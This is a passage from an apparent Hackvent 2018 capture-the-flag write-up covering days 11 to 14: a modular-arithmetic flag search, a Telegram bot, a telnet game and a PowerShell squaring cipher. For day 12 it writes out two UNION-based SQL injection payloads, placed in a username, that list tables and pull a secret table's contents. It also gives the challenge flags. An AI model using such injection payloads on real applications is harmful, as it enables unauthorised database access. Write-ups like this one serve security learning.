As we are searching for a valid flag, the resulting value should begin with 0x485631382d (‘HV18-‘)<\/i>:\n<\/p>\n\n
\nroot@kali:~\/Documents\/hv18\/day11# .\/loopN.py | grep 0x485631382d\n0x485631382d784c76592d54654e542d596745682d7742754c2d6246667a0000L(1337)\n<\/pre><\/div>\n\n
Adding p<\/i> to a<\/i> 1337-times<\/i> produces a valid flag (flag = a + 1337*p<\/i>).<\/p>\n
The only thing left to do is converting the result to ASCII:\n<\/p>\n\n
\n>>> '485631382d784c76592d54654e542d596745682d7742754c2d6246667a'.decode('hex')\n'HV18-xLvY-TeNT-YgEh-wBuL-bFfz'\n<\/pre><\/div>\n\n
The flag is:
\nHV18-xLvY-TeNT-YgEh-wBuL-bFfz<\/strong><\/span><\/p>\n
\n
Day 12: SmartWishList<\/h1>\n\n\n\n\n
\"\"<\/center><\/td>\n
Author: xorkiwi featuring avarx and muffinx<\/span>
\n<\/i><\/td>\n<\/tr>\n
Santa’s being really innovative this year!
<\/p>\n
<\/p>\n
Send your wishes directly over your favorite messenger (telegram): @smartwishlist_bot<\/p>\n
\n
Hint(s):<\/p>\n
How does the bot differentiate your wishes from other people?<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
The bot can be contacted by sending a message to @smartwishlist_bot<\/i> with telegram (I used the web interface):<\/p>\n
\"\"<\/p>\n
The bot provides the following commands:\n<\/p>\n
\/start Start the bot.\n\/help Show commands.\n\/addwish Add wish to whistlist.\n\/removewish Remove wish from wishlist.\n\/showwishes Show your whistlist.\n\/stop Stop the bot.<\/pre>\n
At first I was wondering why my whishlist eventually contained wishes, which I definetley did not add. After the release of the hint, it was quite clear, that the bot does not differentiate the users by an unique ID but the user’s name.<\/p>\n
Editing my name in the application’s preferences inserting some special characters to detect possible injection points revealed that the bot is vulnerable to MySQL-injection within the user’s name.<\/p>\n
After trying out different payloads, it turned out, that the vulnerability can be used to UNION-append 2 fields. Thus I changed my prename to the following in order to list all tables of the database:\n<\/p>\n
' union select 1,table_name FROM information_schema.columns;#<\/pre>\n
\"\"<\/p>\n
The injection can be triggered with the \/showwishes<\/i> command:<\/p>\n
\"\"<\/p>\n
Scrolling to the default MySQL-tablenames the following table caught my attenion:<\/p>\n
\"\"<\/p>\n
I tried to enumerate the columns of the table, which did not suceed because of the size limitation of the name. Nevertheless educated-guessing yielded the desired value:\n<\/p>\n
' union select 1,flag FROM SecretStore;#<\/pre>\n
\"\"<\/p>\n
The flag is:
\nHV18-M4k3-S0m3-R34L-N1c3-W15h<\/strong><\/span><\/p>\n
\n
Day 13: flappy’s revenge<\/h1>\n\n\n\n\n
\"\"<\/center><\/td>\n
Author: M.<\/span>
\n<\/i><\/td>\n<\/tr>\n
There were some rumors that you were cheating at our little game a few days ago … like godmode, huh?
<\/p>\n
<\/p>\n
Well, show me that you can do it again – no cheating this time.<\/p>\n
Location: telnet whale.hacking-lab.com 4242<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
Just like on day 07<\/a> we are faced with a small flappy bird clone. But this time it is not running locally and we can’t just patch the source-code.<\/p>\n
The game can be played by simply connecting to the provided address\/port using telnet<\/i>.<\/p>\n
After playing it for the first time, I thought about how to program a bot, which maneuvers the little bird through the different walls.<\/p>\n
The second time I played I actually reached more than half of the flag and changed my mind believing that it might actually be possible to simply solve the game manually.<\/p>\n
And that’s how I did it. After hitting a wall and thus failing the game, I copied all output from the telnet-session to a texteditor, which I deployed right beside my console in order to be able to quickly determine where the hole in the next wall will be.<\/p>\n
After reaching the full flag my texteditor looked like this:\n<\/p>\n\n
\n#HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH          HHHHHHHHHHHHHH#\n\n#VVVVVVVVVVVVVVVVVVVVVVVVVVVVV          VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV#\n\n#11111111111111111111111111111111111111111111111111111111          111111111111#\n\n#8888888888888888888888888888888888888          8888888888888888888888888888888#\n\n#----------------          ----------------------------------------------------#\n\n#999999999999999          99999999999999999999999999999999999999999999999999999#\n\n#hhhhhhhhhhhhhhhhhhhhhhhhhh          hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh#\n\n#YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY          YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY#\n\n#ffffffffffffffffffffffffffffffffffffffffffffffffff          ffffffffffffffffff#\n\n#-----------------------------------          ---------------------------------#\n\n#LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL          LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL#\n\n#SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS          SSSSSSSSSSSSSSSSSSSSSSS#\n\n#YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY          YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY#\n\n#1111111111111111111111111111111111111          1111111111111111111111111111111#\n\n#------------------------------          --------------------------------------#\n\n#hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh          hhhhhhhhhhhhhhhhhhhhh#\n\n#WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW          WWWWWWWWWWWWWWWWWWWWWWWW#\n\n#ddddddddddddddddddddddddddddddddddd          ddddddddddddddddddddddddddddddddd#\n\n#ZZZZZZZZZZZZZZZZZZZZZZZZ          ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ#\n\n#-------------------------------------------------          -------------------#\n\n#4444444444444444444444444444444444444444444444          4444444444444444444444#\n\n#999999999999999999999999999999999999999999999999999          99999999999999999#\n\n#66666666666666666666666666666666          666666666666666666666666666666666666#\n\n#nnnnnnnnnnnnnnnnnnnnnnnnn          nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn#\n\n#--------------------------------------------------          ------------------#\n\n#MMMMMMMMMMMMMMMMMMMMMMMMMMMMM          MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM#\n\n#bbbbbbbbbbbbbbbbbbbbbbbbbb          bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb#\n\n#ddddddddddddddd          ddddddddddddddddddddddddddddddddddddddddddddddddddddd#\n\n#aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa          aaaaaaaaaaaaaaaa#\n<\/pre><\/div>\n\n
It took me about 15 minutes and thus was probably a lot faster than programming a bot.<\/p>\n
The flag is:
\nHV18-9hYf-LSY1-hWdZ-496n-Mbda<\/strong><\/span><\/p>\n
\n
Day 14: power in the shell<\/h1>\n\n\n\n\n
\"\"<\/center><\/td>\n
Author: HaRdLoCk<\/span>
\n<\/i><\/td>\n<\/tr>\n
seems to be an easy one … or wait, what?
<\/p>\n
<\/p>\n
Encryped flag:<\/p>\n
2A4C9AA52257B56837369D5DD7019451C0EC04427EB95EB741D0273D55<\/p>\n
power.ps1<\/a><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
In the first line of the provided powershell-script (power.ps1<\/i>) another powershell-script (flag.ps1<\/i>) is included, which we do not have access to:\n<\/p>\n\n
\n. \"$PSScriptRoot\\flag.ps1\" #thumbprint 1398ED7F59A62962D5A47DD0D32B71156DD6AF6B46BEA949976331B8E1\n\nif ($PSVersionTable.PSVersion.Major -gt 2)\n{\n    $m = [System.Numerics.BigInteger]::Parse($flag, 'AllowHexSpecifier');\n    $n = [System.Numerics.BigInteger]::Parse(\"0D8A7A45D9BE42BB3F03F710CF105628E8080F6105224612481908DC721\", 'AllowHexSpecifier');\n    $c = [System.Numerics.BigInteger]::ModPow($m, 1+1, $n)\n    write-host \"encrypted flag:\" $c.ToString(\"X\");\n}\n<\/pre><\/div>\n\n
Obviously within that script a variable called $flag<\/i> is defined. The value of this variable is simply squared and reduced to the modulo 0xD8A7A45D…<\/i>. The challenge description contains the resulting value for the flag: 0x2A4C9AA522…<\/i>. So we have basically the following equation:\n<\/p>\n
c = m^2 % n<\/pre>\n
Where:<\/p>\n